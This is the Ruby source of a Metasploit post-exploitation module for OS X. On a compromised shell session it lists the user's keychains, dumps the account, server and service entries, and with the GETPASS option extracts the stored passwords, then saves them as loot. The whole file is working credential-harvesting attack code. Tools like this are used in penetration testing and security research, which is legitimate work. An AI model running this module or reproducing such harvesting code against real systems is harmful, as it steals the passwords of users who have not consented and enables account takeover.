metasploit-framework/modules/post/osx/gather/enum_keychain.rb

128 lines
3.5 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
def initialize(info={})
super(update_info(info,
'Name' => 'OS X Gather Keychain Enumeration',
'Description' => %q{
This module presents a way to quickly go through the current user's keychains and
collect data such as email accounts, servers, and other services. Please note:
when using the GETPASS option, the user will have to manually enter the password,
and then click 'allow' in order to collect each password.
},
'License' => MSF_LICENSE,
'Author' => [ 'ipwnstuff <e[at]ipwnstuff.com>'],
'Platform' => [ 'osx' ],
'SessionTypes' => [ 'shell' ]
))
register_options(
[
OptBool.new('GETPASS', [false, 'Collect passwords.', false])
], self.class)
end
def list_keychains
keychains = cmd_exec("security list")
user = cmd_exec("whoami")
print_status("The following keychains for #{user.strip} were found:")
print_line(keychains.chomp)
return keychains =~ /No such file or directory/ ? nil : keychains
end
def enum_accounts(keychains)
user = cmd_exec("whoami").chomp
out = cmd_exec("security dump | egrep 'acct|desc|srvr|svce'")
i = 0
accounts = {}
out.split("\n").each do |line|
unless line =~ /NULL/
case line
when /\"acct\"/
i+=1
accounts[i]={}
accounts[i]["acct"] = line.split('<blob>=')[1].split('"')[1]
when /\"srvr\"/
accounts[i]["srvr"] = line.split('<blob>=')[1].split('"')[1]
when /\"svce\"/
accounts[i]["svce"] = line.split('<blob>=')[1].split('"')[1]
when /\"desc\"/
accounts[i]["desc"] = line.split('<blob>=')[1].split('"')[1]
end
end
end
return accounts
end
def get_passwords(accounts)
(1..accounts.count).each do |num|
if accounts[num].has_key?("srvr")
c = 'find-internet-password'
s = accounts[num]["srvr"]
else
c = 'find-generic-password'
s = accounts[num]["svce"]
end
cmd = cmd_exec("security #{c} -ga \"#{accounts[num]["acct"]}\" -s \"#{s}\" 2>&1")
cmd.split("\n").each do |line|
if line =~ /password: /
unless line.split()[1].nil?
accounts[num]["pass"] = line.split()[1].gsub("\"","")
else
accounts[num]["pass"] = nil
end
end
end
end
return accounts
end
def save(data)
l = store_loot('macosx.keychain.info',
'plain/text',
session,
data,
'keychain_info.txt',
'Mac Keychain Account/Server/Service/Description')
print_good("#{@peer} - Keychain information saved in #{l}")
end
def run
@peer = "#{session.session_host}:#{session.session_port}"
keychains = list_keychains
if keychains.nil?
print_error("#{@peer} - Module timed out, no keychains found.")
return
end
user = cmd_exec("/usr/bin/whoami").chomp
accounts = enum_accounts(keychains)
save(accounts)
if datastore['GETPASS']
begin
passwords = get_passwords(accounts)
rescue
print_error("#{@peer} - Module timed out, no passwords found.")
print_error("#{@peer} - This is likely due to the host not responding to the prompt.")
end
save(passwords)
end
end
end